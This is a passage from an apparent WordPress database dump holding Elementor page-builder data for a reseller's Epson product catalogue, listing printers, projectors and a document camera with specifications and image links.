AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7916,3474,'_elementor_version','2.5.14'),(7919,3475,'_wp_page_template','template-fullwidth.php'),(7920,3475,'_elementor_edit_mode','builder'),(7921,3475,'_elementor_template_type','post'),(7922,3475,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" 